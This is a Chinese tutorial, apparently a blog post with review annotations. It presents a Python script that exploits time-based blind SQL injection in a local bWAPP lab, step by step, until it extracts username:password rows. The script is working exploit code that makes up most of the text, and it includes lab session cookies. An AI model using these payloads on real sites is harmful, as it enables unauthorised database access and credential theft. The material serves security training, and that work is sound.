文章目录
一、获取数据库名称长度
二、获取数据库名称
三、获取表名总长度
四、获取表名
五、获取指定表列名总长度
六、获取指定表列名
七、获取指定表指定列的表内数据总长度
八、获取指定表指定列的表内数据

一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based
import requests
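import time

# NOTE(review): this listing lost its quotes and the characters = + & > during
# page extraction; they are restored here from context, so the exact spacing of
# the probe strings is a reconstruction.

# Cookie values copied from the author's own local lab session as printed on
# the page; they belong to that session and have to be replaced with the
# reader's own lab session values.
HEADER = {
    "Cookie": (
        "BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; "
        "security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0"
    )
}
# Local bWAPP instance, "SQL Injection - Blind - Time-Based" exercise.
BASE_URL = "http://127.0.0.1:9004/sqli_15.php?"


def get_database_name_length(value1, value2):
    """Find the length of the current database name through a timing oracle.

    For each candidate length 0..99 one request is sent whose first query
    parameter carries a condition followed by ``sleep(1)``; the database only
    sleeps when the condition is true, so a response slower than one second
    marks the matching length.

    The oracle exists because the lab page places the parameter value inside
    its SQL text. A parameterized query removes it, and on the server side the
    pattern is visible as a burst of near-identical requests containing
    ``sleep(`` whose latency steps up by the sleep interval.

    Args:
        value1: name of the injectable query parameter (``"title"`` on the page).
        value2: trailing ``name=value`` pair of the original request
            (``"action=search"`` on the page).

    Returns:
        The first candidate length whose request took longer than one second,
        or 0 when none did (indistinguishable from a real length of 0).
    """
    count = 0
    for i in range(100):
        url = BASE_URL + (
            "{}=Man of Steel' and length(database())={} and sleep(1) -- &{}"
        ).format(value1, i, value2)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        # A single slow response is taken as "true"; unrelated network or
        # server latency above one second would give a false match.
        if time.time() - start_time > 1:
            print("数据库长度为:{}".format(i))
            count = i
            break
    return count


# Invocation shown on the page (the +1 is there because the follow-up function
# iterates over range(1, len)):
#   databaselen = get_database_name_length("title", "action=search") + 1
# Tips from the page: "title" and "action=search" are taken from a Burp capture
# of the lab request, and "--" needs a space on both sides.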
二、获取数据库名称
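def get_database_name(len, value1, value2):
    """Recover the current database name one character at a time.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    For every position 1..len-1 and every code point 0..126, one request asks
    whether ``ascii(substr(database(), position, 1))`` equals the code point;
    a response slower than two seconds is read as "yes". That is up to 127
    requests per character, which is what makes this activity stand out in
    access logs and database slow-query logs.

    Args:
        len: name length plus one (the page passes ``databaselen``).
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The characters recovered, in order; a position with no slow response
        contributes nothing.
    """
    name = ""
    for i in range(1, len):
        for j in range(127):
            url = BASE_URL + (
                "{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- &{}"
            ).format(value1, i, j, value2)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print("{}:{}".format(i, j), chr(j))
                name += chr(j)
                break
    print("数据库名称为:", name)
    return name


# Invocation shown on the page:
#   database = get_database_name(databaselen, "title", "action=search")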
三、获取表名总长度
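def get_table_name_length(database, value1, value2):
    """Find the length of the comma-joined table-name list of one schema.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    The condition compares ``length(GROUP_CONCAT(table_name))`` from
    ``information_schema.tables`` against each candidate 0..99 and relies on
    ``sleep(1)`` as the signal. Lists longer than 99 characters are not found
    by this loop. Which tables appear depends on what the application's
    database account is allowed to see, so a narrowly privileged account
    limits what this step can enumerate.

    Args:
        database: schema name to enumerate.
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The first candidate length whose request took longer than one second,
        or 0 when none did.
    """
    count = 0
    for i in range(100):
        url = BASE_URL + (
            "{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) "
            "FROM information_schema.tables WHERE table_schema = '{}'), 1)) = {} "
            "and sleep(1) -- &{}"
        ).format(value1, database, i, value2)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("表名总长度为:{}".format(i))
            count = i
            break
    return count


# Invocation shown on the page:
#   tablelen = get_table_name_length(database, "title", "action=search") + 1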
四、获取表名
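def get_table_name(len, database, value1, value2):
    """Recover the comma-joined table-name list of one schema, char by char.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    Same timing test as the database-name step, applied to
    ``GROUP_CONCAT(table_name)`` from ``information_schema.tables``; a response
    slower than two seconds confirms a character.

    Args:
        len: list length plus one (the page passes ``tablelen``).
        database: schema name to enumerate.
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The recovered string; table names are separated by commas.
    """
    names = ""
    for i in range(1, len):
        for j in range(127):
            url = BASE_URL + (
                "{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) "
                "FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} "
                "and sleep(2) -- &{}"
            ).format(value1, database, i, j, value2)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                names += chr(j)
                break
        # Progress line after each position, whether or not a character matched.
        print("{}:".format(i), names)
    print("表名为:", names)
    return names


# Invocation shown on the page:
#   get_table_name(tablelen, database, "title", "action=search")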
五、获取指定表列名总长度
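def get_column_name_length(database, table, value1, value2):
    """Find the length of the comma-joined column-name list of one table.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    Candidates 0..99 are compared against
    ``length(group_concat(column_name))`` from ``information_schema.columns``
    for the given table and schema, with ``sleep(1)`` as the signal.

    Args:
        database: schema that holds the table.
        table: table whose columns are counted (``"users"`` on the page).
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The first candidate length whose request took longer than one second,
        or 0 when none did.
    """
    count = 0
    for i in range(100):
        # The last placeholder is the trailing request parameter, so it takes
        # value2 like every other function on the page (the listing passed
        # value1 twice here).
        url = BASE_URL + (
            "{}=Man of Steel' and length(substr((select group_concat(column_name) "
            "from information_schema.columns where table_name='{}' and "
            "table_schema='{}'), 1)) = {} and sleep(1) -- &{}"
        ).format(value1, table, database, i, value2)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("列名总长度为:{}".format(i))
            count = i
            break
    return count


# Invocation shown on the page:
#   columnlen = get_column_name_length(database, "users", "title", "action=search") + 1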
六、获取指定表列名
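def get_column_name(len, database, table, value1, value2):
    """Recover the comma-joined column-name list of one table, char by char.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    Same timing test as the earlier steps, applied to
    ``group_concat(column_name)`` from ``information_schema.columns``; a
    response slower than two seconds confirms a character.

    Args:
        len: list length plus one (the page passes ``columnlen``).
        database: schema that holds the table.
        table: table whose columns are listed.
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The recovered string; column names are separated by commas.
    """
    names = ""
    for i in range(1, len):
        for j in range(127):
            url = BASE_URL + (
                "{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) "
                "from information_schema.columns where table_name='{}' and "
                "table_schema='{}'), 1),{},1))={} and sleep(2) -- &{}"
            ).format(value1, table, database, i, j, value2)
            start_time = time.time()
            # The listing had a stray trailing comma after this call; it only
            # wrapped the unused response in a tuple and is dropped.
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                names += chr(j)
                break
        print("{}:".format(i), names)
    print("列名为:", names)
    return names


# Invocation shown on the page:
#   get_column_name(columnlen, database, "users", "title", "action=search")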
七、获取指定表指定列的表内数据总长度
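def get_data_name_length(table, username, password, value1, value2):
    """Find the length of the joined ``username:password`` rows of one table.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    Candidates 0..99 are compared against the length of
    ``group_concat(username, ':', password)`` over the whole table, with
    ``sleep(1)`` as the signal. Tables whose joined content exceeds 99
    characters are not measured by this loop.

    Args:
        table: table to read (``"users"`` on the page).
        username: name of the first column (``"login"`` on the page).
        password: name of the second column (``"password"`` on the page).
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The first candidate length whose request took longer than one second,
        or 0 when none did.
    """
    count = 0
    for i in range(100):
        url = BASE_URL + (
            "{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) "
            "from {}), 1)) = {} and sleep(1) -- &{}"
        ).format(value1, username, password, table, i, value2)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print("列数据总长度为:{}".format(i))
            count = i
            break
    return count


# Invocation shown on the page:
#   datalen = get_data_name_length("users", "login", "password", "title", "action=search") + 1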
八、获取指定表指定列的表内数据
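def get_data_name(len, table, username, password, value1, value2):
    """Recover the joined ``username:password`` rows of one table, char by char.

    NOTE(review): the listing lost its quotes and the characters = + & > during
    page extraction; they are restored here from context.

    Same timing test as the earlier steps, applied to
    ``group_concat(username, ':', password)``; a response slower than two
    seconds confirms a character. What comes back is whatever the password
    column stores, so salted, slow password hashing limits the value of the
    result even when the injection itself has not yet been fixed.

    Args:
        len: data length plus one (the page passes ``datalen``).
        table: table to read.
        username: name of the first column.
        password: name of the second column.
        value1: name of the injectable query parameter.
        value2: trailing ``name=value`` pair of the original request.

    Returns:
        The recovered string; rows are separated by commas and the two columns
        by a colon.
    """
    data = ""
    for i in range(1, len):
        for j in range(127):
            url = BASE_URL + (
                "{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) "
                "from {}),{},1))={} and sleep(2) -- &{}"
            ).format(value1, username, password, table, i, j, value2)
            start_time = time.time()
            # The listing had a stray trailing comma after this call; it only
            # wrapped the unused response in a tuple and is dropped.
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                data += chr(j)
                break
        print("{}:".format(i), data)
    print("登录数据为:", data)
    return data


# Invocation shown on the page:
#   get_data_name(datalen, "users", "login", "password", "title", "action=search")
# Author's closing remark from the page: this scripted approach seemed faster
# and more efficient than doing the same with Burp; from the column step
# onward the table name has to be picked by hand.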